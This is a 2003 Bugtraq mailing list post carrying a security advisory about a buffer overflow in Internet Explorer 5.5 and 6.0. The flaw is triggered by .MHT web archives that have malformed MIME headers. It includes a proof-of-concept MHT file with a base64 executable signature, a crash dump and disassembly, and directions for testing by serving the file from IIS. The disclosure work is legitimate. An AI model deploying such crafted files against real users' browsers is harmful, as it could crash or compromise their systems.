Home page logo
/

bugtraq logo Bugtraq mailing list archives

.MHT Buffer Overflow in Internet Explorer
From: Tom Tanaka <tomatell () canon-sol jp>
Date: 10 Mar 2003 04:30:07 -0000



CANON SYSTEM SOLUTIONS INC. Security Alert

VULNERABILITY:.MHT Buffer Overflow in Internet Explorer

DATE FOUND:March 2, 2003

Severity:High Risk(code can be executed remotely) 
==========================================================================
====
SUMMARY:

IE5 introduced the new 'Web Archive' format for storing web pages, which 
have the extension MHT. The 'Web Archive' saves a web page as a single 
document complete with all images. The format is a standard 
mime/multipart e-mail message, a mime decoding program such as 7bit, 8bit 
and Base 64 decoder should be able to turn it into something usable with 
your OS and browser of choice. 

This format is pretty nifty and usable, however, there is a potential 
security breach found when used with encoded executable along with 
malformed MIME header in the 'Web Archive'. If the encode data is 
executable or has a single word "MZP" encoded within and Content-Type is 
not designated, IE5 will be terminated by critical buffer 
overflow.Consequently, one could compromise the client pc by executing 
malicious code in the memory. 
==========================================================================
====
AFFECTED SYSTEM:

Microsoft Internet Explorer 5.5 and 6.0; prior versions are not 
vulnerable. 
==========================================================================
====
ANALYSIS:

RFC822 describes the structure of message header used for the MIME. The 
followings are some of the identifiers defined for the MIME header.

&#12288;MIME-Version:
&#12288;Content-Type:
&#12288;Content-Trasfer-Encoding:
&#12288;Content-ID:
&#12288;Content-Description:

The 'Content-Type' is used for defining the types of media transfered. 
The 'Web Archive' format utilizes the Multipart/Related content-type
(defined in RFC2387) to properly embed the multiple web content files. As 
described in RFC2387, the Multipart/Related content-type provides a 
common mechanism for representing objects that are aggregates of related 
MIME body parts. When tranferring html or plain text data encoded in 
the 'Web Archive', IE5 interprets as a plain text with 'carriage return' 
code(0D0A) , otherwise as binary data without 'carriage return' code
(0D0A). By manipulating the MIME header structure and the Base64 encoded 
data as an executable,4 bytes of memory can be overwritten.


PROOF OF CONCEPT:

The following format is usually used for the Web Archive. 
----------------------------------------------
From: <Saved from Microsoft Internet Explorer 5>
Subject: =?iso-2022-jp?B?
GyRCJT0lVSVIJSYlJyUiJVclbSVAJS8lSBsoQiBIb21lUGFnZQ==?=
Date: Tue, 4 Mar 2003 02:16:23 +0900
MIME-Version: 1.0
Content-Type: multipart/related;
        boundary="----=_NextPart_000_0000_01C2E1F4.0D559EA0";
        type="text/html"
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106

This is a multi-part message in MIME format.

------=_NextPart_000_0000_01C2E1F4.0D559EA0
Content-Location:file:///tomatell.exe
Content-Transfer-Encoding: base64

TVpQ
----------------------------------------------


The following sample format contains malformed MIME header along with the 
Base64 encoded executable.
----------------------------------------------
MIME-Version: 1.0
------=_NextPart_000_0000_01C2E1F4.0D559EA0
Content-Location:file:///tomatell.exe
Content-Transfer-Encoding: base64

TVpQ
----------------------------------------------

Note that the encoded string, "TVpQ", is the Win32 EXE signature located 
at the first three bytes of the EXE header. This is for the Win32 system 
to identify the data as a Win32 executable file. IE5 somehow reads this 
signature and interprets the data as an executable whereas the MIME 
encoder/decoder module,'inetcomm.dll', decodes as a plain 7 or 8 bit text 
data. Thus, IE5 creates a stream with a smaller buffersize than that of 
Base64 decoder has.


The following error will occur when the above file is browsed by IE5.

Unhandled exception in iexplore.exe: 0xC0000005: Access Violation.



By debugging through the crash dump, the exception error is generated at 
the EIP(32-bit Instruction Pointer)=74CF497E called from inetcomm.dll to 
Kernel32.

Register
EAX = 00000000 EBX = 05AD3A20 ECX = 001FE074 EDX = 001FE190 
ESI = 05AD39D8 EDI = 00000000 [EIP = 74CF497E] ESP = 0607B2BC 
EBP = 0607B2FC EFL = 00000246


\KernelObjects\CritSecOutOfMemoryEvent

74cf494c ff157412cd74       call    dword ptr 
[KERNEL32.EnterCriticalSection]
74cf4952 834e3c02           or      dword ptr [esi+3c],+02
74cf4956 33ff               xor     edi,edi
74cf4958 397e1c             cmp     dword ptr [esi+1c],edi
74cf495b 743f               jz      74cf499c
74cf495d 397c2410           cmp     dword ptr [esp+10],edi
74cf4961 8bce               mov     ecx,esi
74cf4963 7d06               jnl     74cf496b
74cf4965 ff742410           push    dword ptr [esp+10]
74cf4969 eb25               jmp     short 74cf4990

74cf496b c746441f000000     mov     dword ptr [esi+44],0000001f
74cf4972 e888f3ffff         call    74cf3cff
74cf4977 3bc7               cmp     eax,edi
74cf4979 7c12               jl      74cf498d
74cf497b 8b461c             mov     eax,dword ptr [esi+1c]
74cf497e 8b08               mov     ecx,dword ptr [eax] //Exception


You could test the vulnerablity by copying above exploit to a file with 
an extention ".mht" and place it at the default root directory of IIS web 
server and set it as a default html of the server.

WORKAROUND:
Currently none available.

Credit:
Tom Tanaka

/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
 Tom Tanaka <tomatell () canon-sol co jp>
 Technical Manager, Security 
 Software Products Department
 Tokyo Office
 CANON SYSTEM SOLUTIONS INC..
 1-2-18 Ikenohata Taito-ku, Tokyo 110-0008, Japan
 Ph.:  +81-3-5815-7243
 Fax : +81-3-5815-7262 
/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/




  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]